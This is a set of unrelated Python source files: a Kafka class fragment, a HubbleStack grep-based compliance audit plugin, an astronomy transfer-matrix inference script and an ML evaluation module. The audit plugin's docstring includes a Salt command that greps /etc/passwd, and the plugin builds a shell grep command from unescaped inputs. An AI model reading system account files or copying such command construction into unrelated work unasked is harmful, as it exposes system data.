self.logger.debug(output)
return output
def java_class_name(self):
return "kafka.Kafka"
| |
# -*- encoding: utf-8 -*-
'''
HubbleStack Nova plugin for using grep to verify settings in files.
Supports both blacklisting and whitelisting patterns. Blacklisted patterns must
not be found in the specified file. Whitelisted patterns must be found in the
specified file.
:maintainer: HubbleStack / basepi
:maturity: 2016.7.0
:platform: All
:requires: SaltStack
This audit module requires yaml data to execute. It will search the local
directory for any .yaml files, and if it finds a top-level 'grep' key, it will
use that data.
Sample YAML data, with inline comments:
grep:
whitelist: # or blacklist
fstab_tmp_partition: # unique ID
data:
CentOS Linux-6: # osfinger grain
- '/etc/fstab': # filename
tag: 'CIS-1.1.1' # audit tag
pattern: '/tmp' # grep pattern
match_output: 'nodev' # string to check for in output of grep command (optional)
match_output_regex: True # whether to use regex when matching output (default: False)
grep_args: # extra args to grep
- '-E'
- '-i'
- '-B2'
match_on_file_missing: True # See (1) below
'*': # wildcard, will be run if no direct osfinger match
- '/etc/fstab':
tag: 'CIS-1.1.1'
pattern: '/tmp'
# The rest of these attributes are optional, and currently not used
description: |
The /tmp directory is intended to be world-writable, which presents a risk
of resource exhaustion if it is not bound to a separate partition.
alert: email
trigger: state
(1) If `match_on_file_missing` is ommitted, success/failure will be determined
entirely based on the grep command and other arguments. If it's set to True and
the file is missing, then it will be considered a match (success for whitelist,
failure for blacklist). If it's set to False and the file is missing, then it
will be considered a non-match (success for blacklist, failure for whitelist).
If the file exists, this setting is ignored.
'''
from __future__ import absolute_import
import logging
import fnmatch
import yaml
import os
import copy
import salt.utils
import re
from distutils.version import LooseVersion
log = logging.getLogger(__name__)
def __virtual__():
if salt.utils.is_windows():
return False, 'This audit module only runs on linux'
return True
def audit(data_list, tags, verbose=False, show_profile=False, debug=False):
'''
Run the grep audits contained in the YAML files processed by __virtual__
'''
__data__ = {}
for profile, data in data_list:
if show_profile:
_merge_yaml(__data__, data, profile)
else:
_merge_yaml(__data__, data)
__tags__ = _get_tags(__data__)
if debug:
log.debug('grep audit __data__:')
log.debug(__data__)
log.debug('grep audit __tags__:')
log.debug(__tags__)
ret = {'Success': [], 'Failure': [], 'Controlled': []}
for tag in __tags__:
if fnmatch.fnmatch(tag, tags):
for tag_data in __tags__[tag]:
if 'control' in tag_data:
ret['Controlled'].append(tag_data)
continue
name = tag_data['name']
audittype = tag_data['type']
if 'pattern' not in tag_data:
log.error('No version found for grep audit {0}, file {1}'
.format(tag, name))
tag_data = copy.deepcopy(tag_data)
tag_data['error'] = 'No pattern found'.format(mod)
ret['Failure'].append(tag_data)
continue
grep_args = tag_data.get('grep_args', [])
if isinstance(grep_args, str):
grep_args = [grep_args]
grep_ret = _grep(name,
tag_data['pattern'],
*grep_args).get('stdout')
found = False
if grep_ret:
found = True
if 'match_output' in tag_data:
if not tag_data.get('match_output_regex'):
if tag_data['match_output'] not in grep_ret:
found = False
else: # match with regex
if not re.match(tag_data['match_output'], grep_ret):
found = False
if not os.path.exists(name) and 'match_on_file_missing' in tag_data:
if tag_data['match_on_file_missing']:
found = True
else:
found = False
# Blacklisted pattern (must not be found)
if audittype == 'blacklist':
if found:
ret['Failure'].append(tag_data)
else:
ret['Success'].append(tag_data)
# Whitelisted pattern (must be found)
elif audittype == 'whitelist':
if found:
ret['Success'].append(tag_data)
else:
ret['Failure'].append(tag_data)
failure = []
success = []
controlled = []
if not verbose:
# Pull out just the tag and description
tags_descriptions = set()
for tag_data in ret['Failure']:
tag = tag_data['tag']
description = tag_data.get('description')
if (tag, description) not in tags_descriptions:
failure.append({tag: description})
tags_descriptions.add((tag, description))
tags_descriptions = set()
for tag_data in ret['Success']:
tag = tag_data['tag']
description = tag_data.get('description')
if (tag, description) not in tags_descriptions:
success.append({tag: description})
tags_descriptions.add((tag, description))
control_reasons = set()
for tag_data in ret['Controlled']:
tag = tag_data['tag']
control_reason = tag_data.get('control', '')
description = tag_data.get('description')
if (tag, description, control_reason) not in control_reasons:
tag_dict = {'description': description,
'control': control_reason}
controlled.append({tag: tag_dict})
control_reasons.add((tag, description, control_reason))
else:
# Format verbose output as single-key dictionaries with tag as key
for tag_data in ret['Failure']:
tag = tag_data['tag']
failure.append({tag: tag_data})
for tag_data in ret['Success']:
tag = tag_data['tag']
success.append({tag: tag_data})
for tag_data in ret['Controlled']:
tag = tag_data['tag']
controlled.append({tag: tag_data})
ret['Controlled'] = controlled
ret['Success'] = success
ret['Failure'] = failure
if not ret['Controlled']:
ret.pop('Controlled')
return ret
def _merge_yaml(ret, data, profile=None):
'''
Merge two yaml dicts together at the grep:blacklist and grep:whitelist level
'''
if 'grep' not in ret:
ret['grep'] = {}
for topkey in ('blacklist', 'whitelist'):
if topkey in data.get('grep', {}):
if topkey not in ret['grep']:
ret['grep'][topkey] = []
for key, val in data['grep'][topkey].iteritems():
if profile and isinstance(val, dict):
val['nova_profile'] = profile
ret['grep'][topkey].append({key: val})
return ret
def _get_tags(data):
'''
Retrieve all the tags for this distro from the yaml
'''
ret = {}
distro = __grains__.get('osfinger')
for toplist, toplevel in data.get('grep', {}).iteritems():
# grep:blacklist
for audit_dict in toplevel:
# grep:blacklist:0
for audit_id, audit_data in audit_dict.iteritems():
# grep:blacklist:0:telnet
tags_dict = audit_data.get('data', {})
# grep:blacklist:0:telnet:data
tags = None
for osfinger in tags_dict:
if osfinger == '*':
continue
osfinger_list = [finger.strip() for finger in osfinger.split(',')]
for osfinger_glob in osfinger_list:
if fnmatch.fnmatch(distro, osfinger_glob):
tags = tags_dict.get(osfinger)
break
if tags is not None:
break
# If we didn't find a match, check for a '*'
if tags is None:
tags = tags_dict.get('*', [])
# grep:blacklist:0:telnet:data:Debian-8
if isinstance(tags, dict):
# malformed yaml, convert to list of dicts
tmp = []
for name, tag in tags.iteritems():
tmp.append({name: tag})
tags = tmp
for item in tags:
for name, tag in item.iteritems():
tag_data = {}
# Whitelist could have a dictionary, not a string
if isinstance(tag, dict):
tag_data = copy.deepcopy(tag)
tag = tag_data.pop('tag')
if tag not in ret:
ret[tag] = []
formatted_data = {'name': name,
'tag': tag,
'module': 'grep',
'type': toplist}
formatted_data.update(tag_data)
formatted_data.update(audit_data)
formatted_data.pop('data')
ret[tag].append(formatted_data)
return ret
def _grep(path,
pattern,
*args):
'''
Grep for a string in the specified file
.. note::
This function's return value is slated for refinement in future
versions of Salt
path
Path to the file to be searched
.. note::
Globbing is supported (i.e. ``/var/log/foo/*.log``, but if globbing
is being used then the path should be quoted to keep the shell from
attempting to expand the glob expression.
pattern
Pattern to match. For example: ``test``, or ``a[0-5]``
opts
Additional command-line flags to pass to the grep command. For example:
``-v``, or ``-i -B2``
.. note::
The options should come after a double-dash (as shown in the
examples below) to keep Salt's own argument parser from
interpreting them.
CLI Example:
.. code-block:: bash
salt '*' file.grep /etc/passwd nobody
salt '*' file.grep /etc/sysconfig/network-scripts/ifcfg-eth0 ipaddr -- -i
salt '*' file.grep /etc/sysconfig/network-scripts/ifcfg-eth0 ipaddr -- -i -B2
salt '*' file.grep "/etc/sysconfig/network-scripts/*" ipaddr -- -i -l
'''
path = os.path.expanduser(path)
if args:
options = ' '.join(args)
else:
options = ''
cmd = (
r'''grep {options} {pattern} {path}'''
.format(
options=options,
pattern=pattern,
path=path,
)
)
try:
ret = __salt__['cmd.run_all'](cmd, python_shell=False, ignore_retcode=True)
except (IOError, OSError) as exc:
raise CommandExecutionError(exc.strerror)
return ret
| |
#!/usr/bin/env python
import desdb
import numpy as np
import esutil
import pyfits
import sys
import healpy as hp
#from mpi4py import MPI
#import mpifunctions
#import DBfunctions
import numpy as np
import scipy.spatial
import scipy.interpolate
from sklearn.neighbors import NearestNeighbors
import numpy.lib.recfunctions as recfunctions
import matplotlib
#matplotlib.use('Agg')
import matplotlib.pyplot as plt
from mpl_toolkits.axes_grid1 import make_axes_locatable
import testInference_galmag as huff
def MagNoise(m, z=30):
e = np.power( np.power(10.0, (z-m)/2.5 ), -0.5) * np.random.randn(len(m)) * 3
b = (np.pi/2 + np.arctan(m-z)) / (np.pi * 5)
m = m + e + b
return m
def RandomType(n, min, max, kind, extra=None):
if kind=='uniform':
return np.random.uniform(min, max, n)
elif kind=='gaussian':
return min + np.random.randn(n) * 4
elif kind=='beta':
if extra==None:
extra = [5,3]
return min + np.random.beta(extra[0],extra[1], n) * (max-min)
elif kind=='power':
if extra==None:
extra = 2
return min + np.random.power(extra, n) * (max-min)
def GetBalrogTruth(n, min, max, kind, truthkey, extra=None):
balrog_input = RandomType(n, min, max, kind, extra=extra)
truth = np.zeros(n, dtype=[(truthkey,np.float64)])
truth[truthkey] = balrog_input
return truth
def GetBalrogObserved(a, falloff, wfalloff, simkey, truthkey):
all = np.copy(a)
detprob = np.exp( -(all[truthkey] - 16)/2.5)
detr = np.random.random(len(all))
keep = (detr < detprob)
detected = all[keep]
m = MagNoise(detected[truthkey])
detected = recfunctions.append_fields(detected, simkey, m)
return detected
def GetDESTruth(n, min, max, kind, truthkey, extra=None):
dist = RandomType(n, min, max, kind, extra=extra)
des = np.zeros(n, dtype=[(truthkey,np.float64)])
des[truthkey] = dist
return des
class BalrogInference(object):
def __init__(self, config, data, truth):
self.TruthColumns = config['truth_columns']
self.TruthBins = config['truth_bins']
self.ObsColumns = config['obs_columns']
self.ObsBins = config['obs_bins']
self.data = data
self.truth = truth
self.TransferMatrix = self.Data2TransferMatrix()
def Data2TransferMatrix(self):
SingleDimBinIndex = np.zeros( (len(self.data),len(self.TruthColumns)), dtype=np.int64 )
DimFactor = np.ones( len(self.TruthColumns), dtype=np.int64)
outside = np.zeros(len(self.data), dtype=np.bool_)
NTruthBins = 1
for i in range(len(self.TruthColumns)):
neg = -(i+1)
NTruthBins = NTruthBins * (len(self.TruthBins[neg])-1)
SingleDimBinIndex[:,i] = np.digitize(self.data[self.TruthColumns[neg]], bins=self.TruthBins[neg]) - 1
outside = (outside) | ( (SingleDimBinIndex[:,i]==-1) | (SingleDimBinIndex[:,i]==(len(self.TruthBins[neg])-1)) )
if i > 0:
DimFactor[i] = (len(self.TruthBins[neg+1]) - 1) * DimFactor[i-1]
DimFactor = np.reshape(DimFactor, (1,len(DimFactor)) )
BinIndex = np.sum( SingleDimBinIndex*DimFactor, axis=-1 )
d = recfunctions.append_fields(self.data, 'BinIndex', BinIndex)[-outside]
d = np.sort(d, order='BinIndex')
binindex = np.arange(1, NTruthBins, 1)
splitat = np.searchsorted(d['BinIndex'], binindex)
BalrogByTruthIndex = np.split(d, splitat)
self.NObserved = np.zeros( len(BalrogByTruthIndex) )
NObsBins = 1
SingleDimBinSize = []
for i in range(len(self.ObsColumns)):
NObsBins = NObsBins * (len(self.ObsBins[i]) - 1)
SingleDimBinSize.append( np.diff(self.ObsBins[i]) )
BinVolume = 1.0
inc = 0
for i in range(len(SingleDimBinSize)):
BinVolume = BinVolume * SingleDimBinSize[i]
BinVolume = np.expand_dims(BinVolume, axis=-1)
BinVolume = BinVolume.flatten()
TransferMatrix = np.zeros( (NObsBins,NTruthBins) )
for i in range(len(BalrogByTruthIndex)):
ThisTruth = np.zeros( (len(BalrogByTruthIndex[i]), len(self.ObsColumns)) )
for j in range(len(self.ObsColumns)):
ThisTruth[:,j] = (BalrogByTruthIndex[i][self.ObsColumns[j]])
hist, edge = np.histogramdd(ThisTruth, bins=self.ObsBins)
#hist = hist / (BinVolume * len(ThisTruth))
hist = hist / len(ThisTruth)
self.NObserved[i] = len(ThisTruth)
hist1d = hist.flatten()
TransferMatrix[:, i] = hist1d
return TransferMatrix
def WindowFunction(self):
CanHist = np.zeros( (len(self.truth),len(self.TruthColumns)) )
for i in range(len(self.TruthColumns)):
CanHist[:, i] = self.truth[ self.TruthColumns[i] ]
TruthHist, edge = np.histogramdd(CanHist, bins=self.TruthBins)
self.TruthHist = TruthHist.flatten()
return self.NObserved / self.TruthHist
if __name__=='__main__':
binsize = 0.2
simkey = 'magauto'
truthkey = 'mag'
balrog_min = 16
balrog_max = 28
obs_min = 14
obs_max = 29
config = {'obs_columns': [simkey],
'obs_bins': [np.arange(obs_min,obs_max,binsize)],
'truth_columns': [truthkey],
'truth_bins': [np.arange(balrog_min,balrog_max,binsize)]
}
n = 1e7
ndes = 1e6
falloff = 20
wfalloff = 0.1
#truth = GetBalrogTruth(n, balrog_min, balrog_max, 'gaussian')
#truth = GetBalrogTruth(n, balrog_min, config['truth_bins'][0][-1], 'power', extra=2)
truth = GetBalrogTruth(n, balrog_min, balrog_max, 'power', truthkey, extra=2)
observed = GetBalrogObserved(truth, falloff, wfalloff, simkey, truthkey)
#des_truth = GetDESTruth(n, balrog_min, balrog_max, 'power', extra=3)
#des_truth = GetDESTruth(n, balrog_min, config['truth_bins'][0][-1], 'power', extra=3)
des_truth = GetDESTruth(ndes, balrog_min, balrog_max, 'power', truthkey, extra=3)
des_observed = GetBalrogObserved(des_truth, falloff, wfalloff, simkey, truthkey)
'''
binsize = 0.2
simkey = 'data'
truthkey = 'data_truth'
balrog_min = 15
balrog_max = 25.8
obs_min = 15
obs_max = 28
config = {'obs_columns': [simkey],
'obs_bins': [np.arange(obs_min,obs_max,binsize)],
'truth_columns': [truthkey],
'truth_bins': [np.arange(balrog_min,balrog_max,binsize)]
}
# Generate a simulated simulated truth catalog.
truth = huff.generateTruthCatalog(n_obj=1000000, slope=2.500, downsample=True)
observed = huff.applyTransferFunction(truth, blend_fraction=0)
des_truth = huff.generateTruthCatalog(n_obj=1000000, slope=2.50, downsample=False)
des_observed = huff.applyTransferFunction(des_truth, blend_fraction=0)
print len(truth)==len(des_truth)
'''
BalrogObject = BalrogInference(config, observed, truth)
tm = BalrogObject.TransferMatrix
window = BalrogObject.WindowFunction()
des_hist, edge = np.histogram(des_observed[simkey], bins=config['obs_bins'][0])
c = (config['truth_bins'][0][1:]+config['truth_bins'][0][:-1]) / 2.0
wind = scipy.interpolate.interp1d(c, window)
reg1 = 1.0e-12
reg2 = np.power(10.0, -8)
#reg1 = 0
#reg2 = 0
prior = np.zeros(tm.shape[1])
prior_cov_inv = reg2 * np.identity(tm.shape[1])
'''
prior_cov_inv = np.zeros( (tm.shape[1],tm.shape[1]) )
prior_cov_inv[0,0] = -1
prior_cov_inv[-1,-1] = 1
for i in range(prior_cov_inv.shape[0]-1):
prior_cov_inv[i, i+1] = 1
prior_cov_inv[i+1, i] = -1
#prior_cov_inv = np.dot(tm*window, prior_cov_inv)
#prior_cov_inv = np.dot(np.transpose(prior_cov_inv), prior_cov_inv)
#prior_cov_inv = np.dot(np.transpose(prior_cov_inv), prior_cov_inv) / 100000
'''
cc = (config['obs_bins'][0][1:]+config['obs_bins'][0][:-1]) / 2.0
cut = (cc > c[0]) & (cc < c[-1])
factor = np.sum(des_hist[cut] / wind(cc[cut]) )
#prior_cov_inv = np.dot(np.transpose(prior_cov_inv), prior_cov_inv) / (factor*factor)
prior_cov_inv = np.dot(np.transpose(prior_cov_inv), prior_cov_inv) / (factor)
'''
c_obs = (config['obs_bins'][0][1:]+config['obs_bins'][0][:-1]) / 2.0
prior = des_hist / wind(c_obs)
#prior = des_hist
prior_cov_inv = np.linalg.inv( np.diag(prior) )
print prior.shape, des_hist.shape
'''
descov = np.diag(des_hist + reg1)
descov_inv = np.linalg.inv(descov)
rcr_inv = np.linalg.inv( np.dot( np.transpose(tm), np.dot(descov_inv,tm) ) + prior_cov_inv)
#rcd = np.dot(np.transpose(tm), np.dot(descov_inv, des_hist)) + np.dot(prior_cov_inv, prior)
#des_corr = np.dot(rcr_inv, rcd)
#des_recon = des_corr / window
tm_inv = np.dot(rcr_inv, np.dot(np.transpose(tm), descov_inv))
des_corr = np.dot(tm_inv, des_hist)
des_recon = des_corr / window
#cut = (c > 24)
#print c[cut], wind(c[cut]), des_hist[cut], des_recon[cut]
#print c, wind(c), des_hist, des_recon
shot = np.diag(des_recon)
get_back = np.dot(tm_inv, tm)
shot_rec = np.dot(get_back, np.dot(shot, np.transpose(get_back)))
shot_recon = np.diag(shot_rec)
#leakage_recon = np.dot( tm_inv, np.dot(tm, window*des_recon) - des_hist ) / window - des_recon
leakage_recon = np.dot( (get_back - np.identity(len(des_recon))), des_recon)
#leakage_recon = np.dot( (get_back - np.identity(len(des_recon))), des_recon) / window
#leakage_recon = np.dot( (get_back - np.identity(len(des_recon))), des_recon)
#leakage_recon = np.dot( (get_back - np.diag(get_back)), des_recon)
#leakage_recon = np.dot( np.transpose(get_back - np.diag(get_back)), des_recon)
#err_recon = np.sqrt( shot_recon + np.power(leakage_recon,2.0) )
err_recon = leakage_recon
'''
des_hist, edge = np.histogram(des_observed[simkey], bins=config['obs_bins'][0])
des_cov = np.diag(des_hist)
des_invcov = np.linalg.inv(des_cov)
print des_invcov
'''
plt.figure(1)
#tm = Balrog2TransferMatrix(observed, config['truth_columns'], config['truth_bins'], config['obs_columns'], config['obs_bins'])
im = plt.imshow(tm, origin='lower', extent=[balrog_min,balrog_max,obs_min,obs_max], interpolation='nearest')
plt.plot( [balrog_min,balrog_max],[balrog_min,balrog_max], color='black' )
plt.colorbar()
plt.figure(2)
#bins = np.arange(14, 30, binsize)
bins = config['truth_bins'][0]
center = (bins[1:]+bins[:-1])/2.0
bt, bins = np.histogram(truth[truthkey], bins=bins)
bo, bins = np.histogram(observed[simkey], bins=bins)
dt, bins = np.histogram(des_truth[truthkey], bins=bins)
do, bins = np.histogram(des_observed[simkey], bins=bins)
plt.plot(center, bt, color='blue', label='Sim truth')
plt.plot(center, bo, color='green', label='Sim observed')
plt.plot(center, dt, color='red', label='Data truth')
plt.plot(center, do, color='magenta', label='Data observed')
#leakage_recon = np.dot( (get_back - np.identity(len(des_recon))), dt) / window
#leakage_recon = np.dot( (get_back - np.identity(len(des_recon))), dt)
c = (config['truth_bins'][0][1:]+config['truth_bins'][0][:-1])/2.0
print len(c), len(des_corr)
#plt.plot(c, des_corr, color='black', label='DES no window correction')
plt.scatter(c, des_recon, color='black', label='Reconstruction', s=3)
plt.scatter(c, prior, color='cyan', label='prior', s=3)
#plt.errorbar(c, des_recon, yerr=err_recon, color='black', fmt='o', markersize=3,label='Reconstruction')
plt.errorbar(c, des_recon, yerr=np.sqrt(shot_recon), yerrcolor='black', fmt=None, markersize=3,label='shot noise')
plt.errorbar(c, des_recon, yerr=leakage_recon, yerrcolor='cyan', fmt=None, markersize=3,label='leakage')
plt.legend(loc='best', ncol=2)
#plt.legend(loc='upper left')
#plt.ylim([1,1e5])
plt.ylim([1,1e7])
#plt.xlim([16,28])
plt.xlim([16,28])
plt.yscale('log')
#plt.xscale('log')
plt.show()
| |
# coding: utf-8
import os
import gc
import copy
import csv
import time
import logging
import numpy as np
import pandas as pd
import scipy as sp
import seaborn as sns
import sklearn.model_selection as skms
import matplotlib.pyplot as plt
from sklearn import metrics
from sklearn.base import clone
from sklearn.utils.multiclass import unique_labels
from sklearn.utils.fixes import bincount
from sklearn.preprocessing import LabelEncoder
from sklearn.metrics.classification import _prf_divide
from sklearn.pipeline import Pipeline
from sklearn.externals import joblib
import preprocessing as prep
import util
__author__ = 'Marcin Kowiel, Dariusz Brzezinski'
class Metrics:
def __init__(self, y_true, y_pred, y_prob, y_resolution, resolution_range=None):
if resolution_range is not None:
subset = np.arange(0, y_true.shape[0])[(y_resolution > resolution_range[0]) & (y_resolution <= resolution_range[1])]
y_true = y_true.iloc[subset]
y_pred = y_pred[subset]
if y_prob is not None:
y_prob = y_prob[subset]
self.resolution_range = resolution_range
self.subset_size = y_true.shape[0]
self.n_classes = y_true.nunique()
self.accuracy = metrics.accuracy_score(y_true, y_pred) if y_true is not None else -1
self.top_5_accuracy = top_n_accuracy(y_true, y_prob, top_n=5) if y_true is not None else -1
self.top_10_accuracy = top_n_accuracy(y_true, y_prob, top_n=10) if y_true is not None else -1
self.top_20_accuracy = top_n_accuracy(y_true, y_prob, top_n=20) if y_true is not None else -1
self.macro_recall = metrics.recall_score(y_true, y_pred, average="macro") if y_true is not None else -1
self.kappa = metrics.cohen_kappa_score(y_true, y_pred) if y_true is not None else -1
self.gmean = g_mean(y_true, y_pred) if y_true is not None else -1
self.brier = brier_score_loss_for_true_class(y_true, y_prob) if y_true is not None else -1
self.worst_prediction_rank = worst_prediction_rank(y_true, y_prob) if y_true is not None else -1
class Evaluation:
"""
Evaluation results for a given classifier on a given dataset.
"""
def __init__(self, dataset_name, preprocessing, classifier, search_params, y_true, y_pred, y_prob, y_resolution,
search_results, evaluation_metric, training_time, testing_time,
resolution_ranges=[(0.0, 1.5), (1.5, 2.0), (2.0, 3.0), (3.0, 4.0)]):
"""
Constructor.
:param dataset_name: Dataset name
:type dataset_name: string
:param preprocessing: Global preprocessing applied to the dataset.
:type preprocessing: Preprocessing
:param classifier: Evaluated classifier
:type classifier: BaseEstimator
:param search_params: Parameter grid used if model selection was performed
:type: search_params: dict
:param y_true: True class labels for test data
:type y_true: list
:param y_pred: Predicted class labels for test data
:type y_pred: list
:param y_prob: Predicted probabilities of each class for each example
:type y_prob: array-like
:param search_results: Grid search results
:type search_results: GridSearchCV
:param evaluation_metric: Evaluation metric used to select best model during grid search
:type evaluation_metric: string
:param processing_time: Evaluation time in seconds
:type processing_time: int
"""
self.dataset_name = dataset_name
self.dataset_stats = util.DatasetStatistics(preprocessing.data_frame, preprocessing.class_series)
self.preprocessing = preprocessing
self.classifier = classifier
self.search_params = search_params
self.y_true = y_true
self.y_pred = y_pred
self.y_prob = y_prob
self.y_resolution = y_resolution
self.resolution_ranges = resolution_ranges
self.search_results = search_results
self.best_std = search_results.cv_results_["std_test_score"][search_results.best_index_] \
if search_results is not None else None
self.evaluation_metric = evaluation_metric
self.training_time = training_time
self.testing_time = testing_time
self.metrics = Metrics(y_true, y_pred, y_prob, y_resolution, resolution_range=None)
self.resolution_metrics = []
if resolution_ranges is not None and len(resolution_ranges) > 0:
for resolution_range in resolution_ranges:
self.resolution_metrics.append(Metrics(y_true, y_pred, y_prob, y_resolution, resolution_range))
self.num_of_classes = self.dataset_stats.num_of_classes
self.start_date_time = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(time.time()-training_time-testing_time))
self.end_date_time = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
def __repr__(self):
"""
Returns a string representation of an evaluation. Basic statistics in a readable form.
:return: evaluation score names and values
"""
return "Results:\r\n" \
+ "\tStart: {0}".format(self.start_date_time) + "\r\n" \
+ "\tEnd: {0}".format(self.end_date_time) + "\r\n" \
+ "\tTraining time: {0:.0f} s".format(self.training_time) + "\r\n" \
+ "\tTesting time: {0:.0f} s".format(self.testing_time) + "\r\n" \
+ "\tEvaluation metric: {0}".format(self.evaluation_metric) + "\r\n" \
+ "\tCV params: {0}".format(self.search_results.best_params_
if self.search_results is not None else None) + "\r\n" \
+ "\tAverage CV score: {0:.3f}".format(self.search_results.best_score_
if self.search_results is not None else -1) + "\r\n" \
+ "\tCV std: {0:.3f}".format(self.best_std if self.best_std is not None else -1) + "\r\n" \
+ "\tAccuracy: {0:.3f}".format(self.metrics.accuracy) + "\r\n" \
+ "\tTop-5 accuracy: {0:.3f}".format(self.metrics.top_5_accuracy) + "\r\n" \
+ "\tTop-10 accuracy: {0:.3f}".format(self.metrics.top_10_accuracy) + "\r\n" \
+ "\tTop-20 accuracy: {0:.3f}".format(self.metrics.top_20_accuracy) + "\r\n" \
+ "\tMacro recall: {0:.3f}".format(self.metrics.macro_recall) + "\r\n" \
+ "\tKappa: {0:.3f}".format(self.metrics.kappa) + "\r\n" \
+ "\tG-mean: {0:.3f}".format(self.metrics.gmean) + "\r\n" \
+ "\tBrier score: {0:.3f}".format(self.metrics.brier) + "\r\n" \
+ "\tWorst prediction rank: {0}/{1}".format(self.metrics.worst_prediction_rank, str(self.num_of_classes))
def write_to_csv(self, file_name="ExperimentResults.csv",
save_to_folder=os.path.join(os.path.dirname(__file__), "ExperimentResults"), fold_num=None):
"""
Adds a new row to a csv file with evaluation results. If the given filenmae does not correspond to any existing
csv, a new file is created.
:param file_name: csv file name
:type file_name: string
:param save_to_folder: folder to save the file to
:type save_to_folder: string, optional (default=source file folder/ExperimentResults)
"""
if not os.path.exists(save_to_folder):
os.mkdir(save_to_folder)
file_path = os.path.join(save_to_folder, file_name)
if os.path.isfile(file_path):
write_header = False
mode = "a"
else:
write_header = True
mode = "w"
with open(file_path, mode) as f:
writer = csv.writer(f, delimiter=',', quoting=csv.QUOTE_NONNUMERIC, lineterminator='\n')
if write_header:
header = ["Start date",
"End date",
"Dataset",
"Fold",
"Examples",
"Attributes",
"Number of classes",
"Min class examples",
"Max class examples",
"Classes",
"Preprocessing",
"Grid",
"Grid metric",
"Pipeline",
"Classifier",
"Training time",
"Testing time",
"Best CV parameters",
"Best average CV score",
"CV scores",
"CV standard deviation"]
metric_names = ["Accuracy", "Top 5 acc.", "Top 10 acc.", "Top 20 acc.", "Macro recall", "Kappa",
"G-mean", "Brier score", "Worst prediction rank"]
header.extend(metric_names)
for resolution_metric in self.resolution_metrics:
header.extend([m + " " + str(resolution_metric.resolution_range) for m in metric_names])
writer.writerow(header)
row = [self.start_date_time,
self.end_date_time,
self.dataset_name,
fold_num if fold_num is not None else "",
self.dataset_stats.examples,
self.dataset_stats.attributes,
self.dataset_stats.num_of_classes,
self.dataset_stats.min_examples,
self.dataset_stats.max_examples,
" ".join([str(key) + ": " + str(value)
for key, value in self.dataset_stats.classes.iteritems()]),
self.preprocessing,
self.search_params,
self.evaluation_metric,
util.deep_repr(self.classifier).replace('\n', ' ').replace('\r', ''),
util.classifier_repr(self.classifier).replace('\n', ' ').replace('\r', ''),
self.training_time,
self.testing_time,
self.search_results.best_params_ if self.search_results is not None else "",
self.search_results.best_score_ if self.search_results is not None else "",
self.search_results.cv_results_ if self.search_results is not None else "",
self.best_std]
for metrics in [self.metrics] + self.resolution_metrics:
row.extend([metrics.accuracy, metrics.top_5_accuracy, metrics.top_10_accuracy, metrics.top_20_accuracy,
metrics.macro_recall, metrics.kappa, metrics.gmean, metrics.brier,
metrics.worst_prediction_rank])
writer.writerow(row)
def save_predictions(self, save_to_folder=os.path.join(os.path.dirname(__file__), "ExperimentResults")):
try:
y_true_prob = self.y_prob[np.arange(len(self.y_prob)), self.y_true]\
if self.y_prob is not None else pd.DataFrame(np.zeros((len(self.y_true), 1)))
except:
y_true_prob = 0
y_pred_prob = self.y_prob[np.arange(len(self.y_prob)), self.y_pred] \
if self.y_prob is not None else pd.DataFrame(np.zeros((len(self.y_true), 1)))
classes = self.y_prob.shape[1]
sorted_pred = np.argsort(self.y_prob, axis=1)
rank = classes - np.apply_along_axis(np.where, 1, np.equal(sorted_pred, np.repeat(self.y_true[:, np.newaxis],
classes, 1))).flatten()
rscc = np.full((len(self.y_true), 1), np.nan).flatten()
if self.preprocessing.validation_data is not None:
try:
validation_df = prep.read_validation_data(self.preprocessing.validation_data)
except:
DATA_FOLDER = os.path.abspath(os.path.join(os.path.dirname(__file__), '..', 'Data'))
VALIDATION_DATASET_PATH = os.path.join(DATA_FOLDER, "validation_all.csv")
validation_df = prep.read_validation_data(VALIDATION_DATASET_PATH)
validation_df = validation_df.drop_duplicates(subset="title", keep="first")
rscc = pd.DataFrame({"title": self.y_true.index, "pred": self.y_true.values}).merge(validation_df, on="title", how="left").loc[:, "rscc"].values
predictions = pd.DataFrame({"y_true": self.preprocessing.classes[self.y_true],
"y_pred": self.preprocessing.classes[self.y_pred],
"y_true_prob": y_true_prob,
"y_pred_prob": y_pred_prob,
"prob_diff": y_pred_prob - y_true_prob,
"is_correct": self.y_true == self.y_pred,
"rank": rank,
"resolution": self.y_resolution,
"rscc": rscc},
index=self.y_true.index,
columns=["y_pred", "y_true", "y_pred_prob", "y_true_prob",
"prob_diff", "is_correct", "rank", "resolution", "rscc"])
predictions.to_csv(os.path.join(save_to_folder, _get_file_name(self.dataset_name, self.classifier,
"predictions", "csv")))
def save_model(self, save_to_folder=os.path.join(os.path.dirname(__file__), "ExperimentResults")):
util.save_model(self.classifier, os.path.join(save_to_folder, _get_file_name(self.dataset_name, self.classifier, "model", "pkl")))
def save_feature_importance(self, plot=False, save_to_folder=os.path.join(os.path.dirname(__file__),
"ExperimentResults")):
sns.set_style("whitegrid")
classifier = self.classifier.steps[-1][1]
classifier_name = str(classifier)[:str(classifier).index("(")]
column_names = list(self.preprocessing.data_frame)
try:
blobber = self.classifier.named_steps['preprocessor']
column_names = blobber.column_names
except KeyError:
logging.warning("No BlobberPreprocessor in pipeline when attempting to plot feature importance.")
try:
rfecv = self.classifier.named_steps['rfe']
column_names = column_names[rfecv.support_]
except KeyError:
pass
try:
importances = classifier.feature_importances_
except AttributeError:
try:
importances = np.absolute(classifier.coef_).sum(axis=0)/np.absolute(classifier.coef_).sum()
except (ValueError, AttributeError):
logging.warning("Classifier does not support feature importance")
return
indices = np.argsort(importances)[::-1]
importance_df = pd.DataFrame(
{"attribute": column_names[indices],
"importance": importances[indices]},
index=range(len(column_names)),
columns=["attribute", "importance"])
importance_df.to_csv(os.path.join(save_to_folder, _get_file_name(self.dataset_name, self.classifier, "feature_importance", "csv")),
index=False)
if plot:
self._plot_interactive_feature_importance(column_names[indices], importances[indices], classifier_name)
def save_confusion_matrix(self, save_to_folder=os.path.join(os.path.dirname(__file__), "ExperimentResults")):
"""
Saves a confusion matrix (numpy array) to a file
:param save_to_folder: folder to save the file to
:type save_to_folder: string, optional (default=source file folder/ExperimentResults)
:return:
"""
np.savetxt(os.path.join(save_to_folder, _get_file_name(self.dataset_name, self.classifier, "confusion_matrix", "txt")),
metrics.confusion_matrix(self.y_true, self.y_pred).astype("int"), fmt="%d")
with open(os.path.join(save_to_folder, _get_file_name(self.dataset_name, self.classifier, "confusion_matrix", "txt")) +
"_classes.txt", 'w') as file_obj:
for c in self.preprocessing.classes:
file_obj.write(c + '\n')
